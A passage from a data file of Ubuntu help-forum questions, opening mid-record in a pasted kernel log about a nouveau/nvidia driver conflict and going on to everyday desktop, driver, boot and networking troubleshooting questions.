0000:01:00.0 : 0 : 0x00001030 : type 0x30 idx 0 tag 0x07 nov 10 11:53:23 zs kernel : [ 29.998506 ] [ drm ] nouveau 0000:01:00.0 : 1 : 0x00002130 : type 0x30 idx 1 tag 0x08 nov 10 11:53:23 zs kernel : [ 29.998509 ] [ drm ] nouveau 0000:01:00.0 : 2 : 0x00000210 : type 0x10 idx 2 tag 0xff nov 10 11:53:23 zs kernel : [ 29.998511 ] [ drm ] nouveau 0000:01:00.0 : 3 : 0x00000211 : type 0x11 idx 2 tag 0xff nov 10 11:53:23 zs kernel : [ 29.998514 ] [ drm ] nouveau 0000:01:00.0 : 4 : 0x00000213 : type 0x13 idx 2 tag 0xff nov 10 11:53:23 zs kernel : [ 29.998517 ] [ drm ] nouveau 0000:01:00.0 : raw dcb entry 0 : 04000320 00000028 nov 10 11:53:23 zs kernel : [ 29.998520 ] [ drm ] nouveau 0000:01:00.0 : raw dcb entry 1 : 01000322 00000030 nov 10 11:53:23 zs kernel : [ 29.998523 ] [ drm ] nouveau 0000:01:00.0 : raw dcb entry 2 : 02011310 00000028 nov 10 11:53:23 zs kernel : [ 29.998525 ] [ drm ] nouveau 0000:01:00.0 : raw dcb entry 3 : 02011312 00000030 nov 10 11:53:23 zs kernel : [ 29.998528 ] [ drm ] nouveau 0000:01:00.0 : raw dcb entry 4 : 010223f1 00c1c020 nov 10 11:53:23 zs kernel : [ 29.998537 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 0 at offset 0xbc7e nov 10 11:53:23 zs kernel : [ 30.050942 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 1 at offset 0xbe86 nov 10 11:53:23 zs kernel : [ 30.120749 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 2 at offset 0xd041 nov 10 11:53:23 zs kernel : [ 30.120764 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 3 at offset 0xd130 nov 10 11:53:23 zs kernel : [ 30.140789 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table 4 at offset 0xd2e7 nov 10 11:53:23 zs kernel : [ 30.140795 ] [ drm ] nouveau 0000:01:00.0 : parsing vbios init table at offset 0xd34c nov 10 11:53:23 zs kernel : [ 30.170875 ] [ drm ] nouveau 0000:01:00.0 : 0xd34c : condition still not met after 20ms , skipping following opcodes nov 10 11:53:23 zs kernel : [ 30.170906 ] [ drm ] nouveau 0000:01:00.0 : 0xaf80 : parsing output script 0 nov 10 11:53:23 zs kernel : [ 30.170912 ] [ drm ] nouveau 0000:01:00.0 : 0xaf80 : parsing output script 0 nov 10 11:53:23 zs kernel : [ 30.170916 ] [ drm ] nouveau 0000:01:00.0 : 0xa64e : parsing output script 0 nov 10 11:53:23 zs kernel : [ 30.254497 ] type=1505 audit ( 1320954803.872:10 ) : operation= '' profile_replace '' pid=852 name= '' /sbin/dhclient3 '' nov 10 11:53:23 zs kernel : [ 30.255310 ] type=1505 audit ( 1320954803.872:11 ) : operation= '' profile_replace '' pid=852 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' nov 10 11:53:23 zs kernel : [ 30.305204 ] [ ttm ] zone kernel : available graphics memory : 1027826 kib . nov 10 11:53:23 zs kernel : [ 30.305217 ] [ drm ] nouveau 0000:01:00.0 : 640 mib vram nov 10 11:53:23 zs kernel : [ 30.327746 ] [ drm ] nouveau 0000:01:00.0 : 512 mib gart ( aperture ) nov 10 11:53:23 zs kernel : [ 30.329065 ] mtrr : type mismatch for c0000000,10000000 old : write-back new : write-combining nov 10 11:53:23 zs kernel : [ 30.329664 ] [ drm ] nouveau 0000:01:00.0 : allocating fifo number 1 nov 10 11:53:23 zs kernel : [ 30.334438 ] [ drm ] nouveau 0000:01:00.0 : nouveau_channel_alloc : initialised fifo 1 nov 10 11:53:23 zs kernel : [ 30.334987 ] [ drm ] nouveau 0000:01:00.0 : detected a dac output nov 10 11:53:23 zs kernel : [ 30.334990 ] [ drm ] nouveau 0000:01:00.0 : detected a tmds output nov 10 11:53:23 zs kernel : [ 30.334993 ] [ drm ] nouveau 0000:01:00.0 : detected a dac output nov 10 11:53:23 zs kernel : [ 30.334995 ] [ drm ] nouveau 0000:01:00.0 : detected a tmds output nov 10 11:53:23 zs kernel : [ 30.334998 ] [ drm ] nouveau 0000:01:00.0 : dcb encoder 1 unknown nov 10 11:53:23 zs kernel : [ 30.335002 ] [ drm ] nouveau 0000:01:00.0 : detected a dvi-i connector nov 10 11:53:23 zs kernel : [ 30.335629 ] [ drm ] nouveau 0000:01:00.0 : detected a dvi-i connector nov 10 11:53:24 zs kernel : [ 30.528555 ] [ drm ] nouveau 0000:01:00.0 : allocated 1680x1050 fb : 0x40250000 , bo ffff880058a91000 nov 10 11:53:24 zs kernel : [ 30.528735 ] fb0 : nouveaufb frame buffer device nov 10 11:53:24 zs kernel : [ 30.528738 ] registered panic notifier nov 10 11:53:24 zs kernel : [ 30.528746 ] [ drm ] initialized nouveau 0.0.15 20090420 for 0000:01:00.0 on minor 0 nov 10 11:53:24 zs kernel : [ 30.540435 ] e1000e 0000:00:19.0 : irq 27 for msi/msi-x nov 10 11:53:24 zs kernel : [ 30.570248 ] input : hda intel line in at ext rear jack as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 nov 10 11:53:24 zs kernel : [ 30.570358 ] input : hda intel mic at ext front jack as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 ... nov 10 11:53:25 zs kernel : [ 31.668292 ] nvidia : module license 'nvidia ' taints kernel . nov 10 11:53:25 zs kernel : [ 31.668296 ] disabling lock debugging due to kernel taint nov 10 11:53:25 zs kernel : [ 32.317525 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:25 zs kernel : [ 32.317529 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:25 zs kernel : [ 32.317531 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:25 zs kernel : [ 32.317532 ] nvrm : the nvidia device ( s ) . nov 10 11:53:25 zs kernel : [ 32.317535 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:25 zs kernel : [ 32.317536 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:25 zs kernel : [ 32.317537 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:25 zs kernel : [ 32.317538 ] nvrm : again . nov 10 11:53:25 zs kernel : [ 32.317540 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:25 zs kernel : [ 32.358823 ] [ drm ] nouveau 0000:01:00.0 : 0x0f8f : parsing clock script 0 nov 10 11:53:25 zs kernel : [ 32.359228 ] console : switching to colour frame buffer device 210x65 nov 10 11:53:26 zs kernel : [ 33.071512 ] e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : rx/tx nov 10 11:53:26 zs kernel : [ 33.071822 ] addrconf ( netdev_change ) : eth0 : link becomes ready nov 10 11:53:29 zs kernel : [ 35.479454 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:29 zs kernel : [ 35.479458 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:29 zs kernel : [ 35.479460 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:29 zs kernel : [ 35.479461 ] nvrm : the nvidia device ( s ) . nov 10 11:53:29 zs kernel : [ 35.479464 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:29 zs kernel : [ 35.479465 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:29 zs kernel : [ 35.479466 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:29 zs kernel : [ 35.479467 ] nvrm : again . nov 10 11:53:29 zs kernel : [ 35.479469 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:30 zs kernel : [ 36.436692 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:30 zs kernel : [ 36.436697 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:30 zs kernel : [ 36.436698 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:30 zs kernel : [ 36.436700 ] nvrm : the nvidia device ( s ) . nov 10 11:53:30 zs kernel : [ 36.436702 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:30 zs kernel : [ 36.436703 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:30 zs kernel : [ 36.436704 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:30 zs kernel : [ 36.436706 ] nvrm : again . nov 10 11:53:30 zs kernel : [ 36.436708 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:30 zs kernel : [ 37.336097 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:30 zs kernel : [ 37.336102 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:30 zs kernel : [ 37.336103 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:30 zs kernel : [ 37.336104 ] nvrm : the nvidia device ( s ) . nov 10 11:53:30 zs kernel : [ 37.336107 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:30 zs kernel : [ 37.336108 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:30 zs kernel : [ 37.336109 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:30 zs kernel : [ 37.336110 ] nvrm : again . nov 10 11:53:30 zs kernel : [ 37.336113 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:31 zs kernel : [ 38.180042 ] device eth0 entered promiscuous mode nov 10 11:53:31 zs kernel : [ 38.185035 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:31 zs kernel : [ 38.185039 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:31 zs kernel : [ 38.185040 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:31 zs kernel : [ 38.185041 ] nvrm : the nvidia device ( s ) . nov 10 11:53:31 zs kernel : [ 38.185044 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:31 zs kernel : [ 38.185045 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:31 zs kernel : [ 38.185046 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:31 zs kernel : [ 38.185047 ] nvrm : again . nov 10 11:53:31 zs kernel : [ 38.185049 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:32 zs kernel : [ 39.085538 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:32 zs kernel : [ 39.085542 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:32 zs kernel : [ 39.085544 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:32 zs kernel : [ 39.085545 ] nvrm : the nvidia device ( s ) . nov 10 11:53:32 zs kernel : [ 39.085547 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:32 zs kernel : [ 39.085549 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:32 zs kernel : [ 39.085550 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:32 zs kernel : [ 39.085551 ] nvrm : again . nov 10 11:53:32 zs kernel : [ 39.085553 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:33 zs kernel : [ 39.892052 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:33 zs kernel : [ 39.892056 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:33 zs kernel : [ 39.892058 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:33 zs kernel : [ 39.892059 ] nvrm : the nvidia device ( s ) . nov 10 11:53:33 zs kernel : [ 39.892062 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:33 zs kernel : [ 39.892063 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:33 zs kernel : [ 39.892064 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:33 zs kernel : [ 39.892065 ] nvrm : again . nov 10 11:53:33 zs kernel : [ 39.892067 ] nvrm : no nvidia graphics adapter probed ! nov 10 11:53:34 zs kernel : [ 40.695893 ] nvrm : the nvidia probe routine was not called for 1 device ( s ) . nov 10 11:53:34 zs kernel : [ 40.695896 ] nvrm : this can occur when a driver such as nouveau , rivafb , nov 10 11:53:34 zs kernel : [ 40.695898 ] nvrm : nvidiafb , or rivatv was loaded and obtained ownership of nov 10 11:53:34 zs kernel : [ 40.695899 ] nvrm : the nvidia device ( s ) . nov 10 11:53:34 zs kernel : [ 40.695902 ] nvrm : try unloading the conflicting kernel module ( and/or nov 10 11:53:34 zs kernel : [ 40.695903 ] nvrm : reconfigure your kernel without the conflicting nov 10 11:53:34 zs kernel : [ 40.695904 ] nvrm : driver ( s ) ) , then try loading the nvidia kernel module nov 10 11:53:34 zs kernel : [ 40.695905 ] nvrm : again . nov 10 11:53:34 zs kernel : [ 40.695907 ] nvrm : no nvidia graphics adapter probed ! ... i tried uninstalling xserver-xorg-video-nouveau ( and hence xserver-xorg-video-all ) , but that did n't do anything . here 's all i have left installed : $ dpkg -l | grep nvidia ii nvidia-173-modaliases 173.14.22-0ubuntu11 modaliases for the nvidia binary x.org driver ii nvidia-96-modaliases 96.43.17-0ubuntu1.1 modaliases for the nvidia binary x.org driver ii nvidia-common 0.2.23 find obsolete nvidia drivers ii nvidia-current-modaliases 195.36.24-0ubuntu1~10.04.1 modaliases for the nvidia binary x.org driver $ aptitude search nouveau i libdrm-nouveau1 - userspace interface to nouveau-specific ke p libdrm-nouveau1-dbg - userspace interface to nouveau-specific ke p nouveau-firmware - firmware for nvidia graphics cards p xserver-xorg-video-nouveau - x.org x server -- nouveau display driver ( last bit of info on drivers : $ lspci -v 01:00.0 vga compatible controller : nvidia corporation g80 [ geforce 8800 gts ] ( rev a2 ) subsystem : nvidia corporation device 0421 flags : bus master , fast devsel , latency 0 , irq 16 memory at de000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at dc000000 ( 64-bit , non-prefetchable ) [ size=32m ] i/o ports at dc80 [ size=128 ] expansion rom at dfe00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nouveau kernel modules : nvidia , nvidiafb , nouveau $ lsmod | egrep 'nouveau|nvidia' nouveau 515227 3 ttm 61039 1 nouveau drm_kms_helper 30742 1 nouveau drm 200288 3 nouveau , ttm , drm_kms_helper i2c_algo_bit 6024 1 nouveau update 3 : guess i should also note by now that this is on a desktop .
77803	calibre installations hangs	i installed calibre via the usc , but it got to about 90 % and now it only shows a message : `` waiting for configuration file prompt '' it has been standing like this for 12 hours , and i can not remove it or cancel the installation . i ca n't install any other apps while this is in progress .
77804	can i install microsoft visual studio on my ubuntu machine ?	i want to use sql server r2 2008 ( which in on another server ) by installing its client . is their any way to sort out my problem . please help
77805	how can i access network from terminal ?	so i 'm trying to recover from a hugely failed upgrade from 11.04 to 11.10 . i can get my system to boot to console but not to desktop . so from the console i 'm trying to fix broken packages . but i can not access my network . i 'm on the live cd now and i can connect to the wireless network . here is my chain of events from console when booting without live cd , trying to obtain network access - ~ $ ifconfig wlan0 up ~ $ iwlist wlan0 scan ~ $ iwconfig wlan0 essid `` dd-wrt '' ~ $ dhclient wlan0 i should say my network is named dd-wrt , and it is unsecured do i need quotes on like i have ? so home come this is n't connecting ?
77806	how can i change the number of workspaces in workspace switcher ?	how can i change the number of workspaces in workspace switcher using ubuntu 11.10 . in ubuntu 10 there was an opportunity to set other size than 2x2 . i prefer 3x3 workspaces , how can i reach this in ubuntu 11.10 .
77816	i ca n't able to install ubuntu alongside with win7 ..:	i was unable to install ubuntu 11.04 and 10.10 with wubi , and also , i was unable to boot up my pc through 11.04 though i did it with ubuntu 10.10 as a live session . when i try to install ubuntu ( both version ) alongside with win7 , following massage is appearing when extracting the kernal , error executing command command= c : \windows\sysnative\bcdedit.exe/set { d99017fa-e624-11e0-a90b-f90474903c3b } device partition= d : retval=1 stdrr=an error has occurred setting the data the request is not supported . stdout= for more information please see the log file c : user\ p-\appdata\local\temp\wubi-10.10-revi97.log please , i asking help from someone to overcome this matter.. ps : i 'm using 64-bit processor
77817	headphones and speakers , both working	as i am listening the song from my laptop , installed ubuntu 10.04 recently , and when i plugged in the headphones , the sound is still coming from the laptop speakers , creating noise . please help me that how can i fix it ? ? there is no hardware problem coz when i was using windows , my headfones and laptop speakers were working perfectly well , separate from each other .
77821	how to report apt repository working bad ?	i found since last year uy.archive.ubuntu.com working really bad ( 20k downloading ) , so each time i install ubuntu i have to change to archive.ubuntu.com . i think it could be complicated for normal users in uruguay . i want to report this problems but i 'm not sure if i should open a bug or what should i really do ?
77833	keyboard does not work in dash	since the last update of my os ubuntu 11.10 , i am not able to type in the dash . in any other application ( like firefox for this message ) , the keyboard is working fine , but in the dash `` window '' of unity ( i am not sure what it is called officially ) , the keyboard is buggy . sometimes i manage to enter one or two characters , but most of the time nothing appears as if the key-press signal was not received . before the update , i actually was working with gnome-classic ( i had removed unity from oneiric ) . the update seemed to have reinstalled unity , but something apparently is missing or damaged . does anybody have a clue about what could be done to repair the dash ?
77843	ca n't mount sd card , - /dev/sdc is ok , but ca n't seed /dev/sdc1	few weeks ago i mentioned that sdcard ca n't be mounted under ubuntu 11.04 on eeeepc 901 . i can see /dev/sdc and /dev/sdd , but no partitions on them /dev/sda and /dev/sdb are system disks , sdc was usually a card in card reader . rebooted twice so far . this sd card works good in camera . uname -a linux tool 2.6.38-11-generic # 50-ubuntu smp mon sep 12 21:18:14 utc 2011 i686 i686 i386 gnu/linux lsusb | grep -i reader bus 001 device 007 : id 058f:6335 alcor micro corp. sd/mmc card reader ejected sd-card ; nov 10 19:54:29 tool kernel : [ 77005.072799 ] usb 1-5 : usb disconnect , address inserted sd card nov 10 20:04:53 tool kernel : [ 77629.332180 ] usb 1-5 : new high speed usb device using ehci_hcd and address 7 nov 10 20:04:53 tool kernel : [ 77629.471568 ] scsi11 : usb-storage 1-5:1.0 nov 10 20:04:54 tool kernel : [ 77630.473409 ] scsi 11:0:0:0 : direct-access single flash reader 1.00 pq : 0 ansi : 0 nov 10 20:04:54 tool kernel : [ 77630.483607 ] sd 11:0:0:0 : attached scsi generic sg2 type 0 nov 10 20:04:55 tool kernel : [ 77630.791132 ] sd 11:0:0:0 : [ sdc ] attached scsi removable disk ll /dev/sd* after insert brw-rw -- -- 1 root disk 8 , 0 2011-11-02 05:53 /dev/sda brw-rw -- -- 1 root disk 8 , 1 2011-11-02 05:53 /dev/sda1 brw-rw -- -- 1 root disk 8 , 16 2011-11-02 05:53 /dev/sdb brw-rw -- -- 1 root disk 8 , 17 2011-11-02 05:53 /dev/sdb1 brw-rw -- -- 1 root disk 8 , 32 2011-11-10 20:04 /dev/sdc brw-rw -- -- 1 root disk 8 , 48 2011-11-10 19:52 /dev/sdd fdsik -l /dev/sd [ cd ] *empty* sudo mount /dev/sdc /mnt/1 mount : /dev/sdc : unknown device sudo fdisk -l disk /dev/sda : 4034 mb , 4034838528 bytes 109 heads , 2 sectors/track , 36149 cylinders units = cylinders of 218 * 512 = 111616 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x70b81d75 device boot start end blocks id system /dev/sda1 * 10 36141 3938304 83 linux disk /dev/sdb : 8069 mb , 8069677056 bytes 255 heads , 63 sectors/track , 981 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b183a device boot start end blocks id system /dev/sdb1 1 981 7879851 83 linux
77845	my terminal prompt ps1 mixed up	by the way i 'm on a mac os x but i 'm connected to an ubuntu server . yesterday i installed a module for node.js ( after a hour i deleted it ) which asked me to add something to the .bashrc file and now when i log in with my mac terminal over ssh i see this as my connected name : [ e ] 0 ; u @ h : wa ] [ 033 [ 01 ; 32m ] u @ h [ 033 [ 00m ] : [ 033 [ 01 ; 34m ] w [ 033 [ 00m ] $ as i know .bashrc is a file which runs commands when i login , so i thought that this is the problem , so i read a little on the web and some guys recommended to get the original file from : /etc/skel/.bashrc so i copied this file over the running one : cp /etc/skel/.bashrc /etc/bash.bashrc then i rebooted , and nothing happened . everything works but my screen name is extremely ugly and i need to use the terminal a lot . so what should i do ?
77851	ati proprietary driver ( post release ) install fails . how can i fix it ?	if ati post release driver is selected , install fails . how can i fix it ? and i do n't mean compiling and installing myself the ati driver from command line , but to make the `` additional drivers '' application work correctly . is there a bug for this in launchpad ?
77852	which should i choose : asus ux31 vs. macbook air	i 'd like to replace my netbook ( samsung n210 ) by something a little bit more powerful while keeping my machine weight low and long battery life . i currently hesitate between two machines i consider on par feature wise . the asus ux31 : pluses : nice screen resolution , good battery life , usb3 minuses : low screen view angles , no backlit keyboard the macbook air 13 inches : pluses : nice screen resolution and view angles , backlit keyboard , one-thunderbolt-cable docking station minuses : price , the non-standard keyboard layout , no usb3 as i do n't want to give up using ubuntu as i have for 5 years now , i wonder , which should i pick with this in mind ? i fear that we will never get the possibility to fully use the thunderbolt port ( for the apple screen for example ) , but is the usb3 support in linux in good shape ? also , if ubuntu could run out of the box without tinkering that would be nice ( even if i do n't mind a bit hacking , my free time is rare these days ) .
77854	an easy way to add applications to autostart in unity	first i want to tell that i 've read this answer . main menu has gone now ... well perfect would be to have a list of all applications and select among them .
77859	does a text to class diagram generator exist ?	i would like to generate a class diagram as an image . this package should read an input text file and generate the output . i do n't want to draw it ( so dia is not the solution for my problem ) . i am searching for an equivalent for class diagrams simmilar to graphviz with graphs .
77868	using a4tech camera with skype	i have a a4tech pk-635 web cam , and i can view output from web cam in cheese . skype is detecting webcam as dev/video0 , but skype is not generating any output ... any ideas ? note : in case any one else also face this , here is a solution to fix this problem and also update skyp launcher , so that you can launch skype as usual .
77869	unity-2d is slow on my computer	i have an old computer which works nicely with gnome-2 ( 10.04 lts ) . i swapped out the hard drive and installed 11.10 for testing purposes getting ready for 12.04 lts but unity-2d is painfully slow , as is gnome-fallback . i ca n't even run gnome-3-shell or unity-full . i understand that gnome-2 has depreciated or is about to depreciate . so my question is , does this mean i only have 2 choices ? either buy a new computer which is fast enough to run gnome-3 in a responsive manner , or switch to a lighter desktop environment , something like xfce as gnome-2 will no longer be an option ? i 'm wondering if someone will take on the responsibility of maintaining gnome-2 in a separate branch after depreciation ... i have a dell gx270 , which has : graphics : integrated intel extreme速 graphics 2 ram : 1gb
77871	what is the significance of the group created along side a user ?	as i was reading answers to this question asking how to change usernames , a suggestion to change of the name of the group was also made in this answer . what is the significance of the groups whose only member is the user with the same name ?
77872	keyboard/mouse does n't work on mac mini	the usb keyboard and mouse worked fine during installation , and works fine until and including the grub menu , but in the login screen ( or recovery menu ) it does n't work at all . i 've followed recent instructions for installing 11.04 , and i 'm booting with one of these grub settings ( normal and recovery boot , respectively ) : linux /boot/vmlinuz-2.6.38-12-generic root=/dev/sda2 ro nomodeset xforcevesa quiet splash vt.handoff=7 linux /boot/vmlinuz-2.6.38-12-generic root=/dev/sda2 ro nomodeset xforcevesa single during boot i see something like this output : ureadahead terminated with status 5 ureadahead-other terminated with status 5 automatic bug reporting [ ... ] failed plymouth terminated with status 1 why are my keyboard and mouse not working ? tried to install without a separate /var partition to see if that works . looks like others have fixed the ureadahead issue this way , but it made no difference . both mouse and keyboard work when booting from the live cd . after a chroot /media/ [ guid ] and grep -i 'error\|warn\|critical\|terminated ' /var/log/syslog : kernel : [ 5.731418 ] ext3-fs ( sda2 ) : error : could n't mount because of unsupported optional features ( 240 ) kernel : [ 5.731578 ] ext2-fs ( sda2 ) : error : could n't mount because of unsupported optional features ( 240 ) kernel : [ 10.372093 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro gdm-binary [ 507 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory init : apport pre-start process ( 554 ) terminated with status 1 init : apport post-stop process ( 641 ) terminated with status 1 gdm-binary [ 507 ] : warning : unable to find users : no seat-id found networkmanager [ 550 ] : < warn > bluez error getting default adapter : the name org.bluez was not provided by any .service files gdm-simple-slave [ 700 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory kernel : [ 17.403135 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro , commit=0 gdm-session-worker [ 875 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory gdm-simple-greeter [ 873 ] : gtk-warning : /build/buildd/gtk+2.0-2.24.4/gtk/gtkwidget.c:5687 : widget not within a gtkwindow kernel : [ 24.993468 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro , commit=0 gdm-simple-greeter [ 873 ] : warning : unable to load ck history : no seat-id found more goodies from /var/log/gdm/* : gdm-simple-greeter [ 873 ] : gtk-warning : /build/buildd/gtk+2.0-2.24.4/gtk/gtkwidget.c:5687 : widget not within a gtkwindow window manager warning : buggy client sent a _net_active_window message with a timestamp of 0 for 0x1000034 ( login wind ) window manager warning : meta_window_activate called by a pager with a 0 timestamp ; the pager needs to be fixed . gdm-simple-greeter [ 873 ] : warning : unable to load ck history : no seat-id found gnome-settings-daemon : fatal io error 11 ( resource temporarily unavailable ) on x server :0. gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . window manager warning : fatal io error 11 ( resource temporarily unavailable ) on display ':0 ' . gdm-simple-greeter : fatal io error 11 ( resource temporarily unavailable ) on x server :0. gnome-power-manager : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols errors from xkbcomp are not fatal to the x server error setting mtrr ( base = 0xd1000000 , size = 0x00e00000 , type = 1 ) invalid argument ( 22 ) gdm-simple-slave [ 700 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory gdm-session-worker [ 875 ] : warning : unable to load file '/etc/gdm/custom.conf ' : no such file or directory edit : filed a bug report .
77878	how to fix empathy startup bug and sudden crash ?	in a fresh ubuntu install from a bootable pendrive or a cd drive the empathy im application crashes on startup . i faced problems in each installation and after a lot of trial & error methods i found out how to make empathy stable without any technical knowledge ( no terminal ) . i just tried this : start empathy from the menu somehow and quickly click on the âviewâ option and disable the offline contacts but this solves my problem until i reboot . after rebooting it resets itself . while running from terminal it shows me segmentation fault i tried this link also but not helpful yet . sysinfo : release : ubuntu 11.10 ( oneiric ) gnome : 2.32.1 ( ubuntu 2011-04-14 ) kernel : 3.0.0-13-generic ( # 22-ubuntu smp wed nov 2 13:25:36 utc 2011 )
77881	how can i start an other xserver on a different terminal so that i have two xservers running at the same time .	in reference to the question alt+tab out of full screen game with the answer : start an other xserver on a different terminal . say tty8 . then switch between them when running the game in full screen mode . i would like to do this when playing hon .
77882	adding a cpu monitor widget in the top corner like in gnome2	i wonder if you can add a widget or something like it in the top corner ( next to volume and wifi and things like that ) that displays current use of cpu and maybe ram . i know you could add stuff like that in gnome2 , altough i ca n't find a feature like that in unity or gnome3 .
77886	how to unlock vmware for use with mac os x guests ( enable mac os x virtual machines )	i have this problem i 'm trying to install mac os x lion 10.7 on vmware station 8.0.0 , i found some tutorials to install mac os x on vmware but they all was for windows . although the program is same for windows and ubuntu , there was one difference which is realted to a patch used to unlock vmware for use with mac os x guests . i had downloaded the files for that patch there was files for each os ; windows , solaries , osx , ubuntu 32 and 64 bit the problem is in installing that patch in windows you need just to run the .bat file and everything works grate but i do n't know how to run it for ubuntu 32 bit ? the files for that patch can be found on this link patch files and here a link to download them directly '' includes additionl files '' direct link so again all what i want to know is how to install the patch on ubuntu regards
77887	killing subprocess in ubuntu not the parent ?	i want to kill a process in ubuntu . i have java installed and running jboss & tomcat at background . i need to kill tomcat after deployment but when i kill it jboss is going too . i had to use kill -9 pidofjava killall tomcat but status is still same . what i need to do to kill a process attribute ? i mean subprocess ?
77888	microphone problem in ubuntu 11.10	i am using both windows 7 and ubuntu 11.10 on a single system with the same hardware . while i 'm making call through gmail or skype my voice is audible to others while i 'm on windows 7 , but while i 'm on ubuntu 11.10 it 's not audible to others , but i am able to hear their voice . but while i 'm playing music on ubuntu along with a call , the others are able to hear the music , but my voice is not audible for them . please give me a solution for this and tell me where i can change the microphone settings on ubuntu 11.10 .
77893	is it efficient to install x/lubuntu and use kde/gnome applications	i often met people stating they want to install xfce , gnome or other desktop manager in order to get better performance . but as the conversation goes on , it appears they use plethora of apps from other desktop . which means they have to install and run related librairies . so is it interesting to install a âť light âť desktop manager if you use apps from different desktop ?
77896	where to find up-to-date redis package for 10.04 ?	this is a strange thing . ubuntu is so widely used , but it is hard to find packages for popular software . for example , when you search http : //software.opensuse.org you can find a package for redis : http : //download.opensuse.org/repositories/server : /database/opensuse_11.4/src/ this is a good expirience . where to find the latest version of the redis package for ubuntu ?
77903	lightning is not compatible with thunderbird 7.0.1	i reinstalled ubuntu 11.10 the other day and now when i try to install the lightning extension in thunderbird it states : lightning is not compatible with thunderbird 7.0.1 . as extra information lightning is not comming up automaticly when searching for it within thunderbird . you need to download it manually . and also i had it installed before i reformated the computer . anybody has a solution to this issue ?
77904	grub wo n't load windows 7 ( unknown file system )	i recently installed 11.10 on a new partition on my windows 7 pc , and it works perfectly . but when i want to boot windows 7 from the grub boot menu , it just says unknown file system , grub rescue . windows recovery says there is nothing wrong with it , an i can access all the files through ubuntu . the ubuntu disk utility says that the windows 7 partition file system is not clean . how do i get my windows 7 back ?
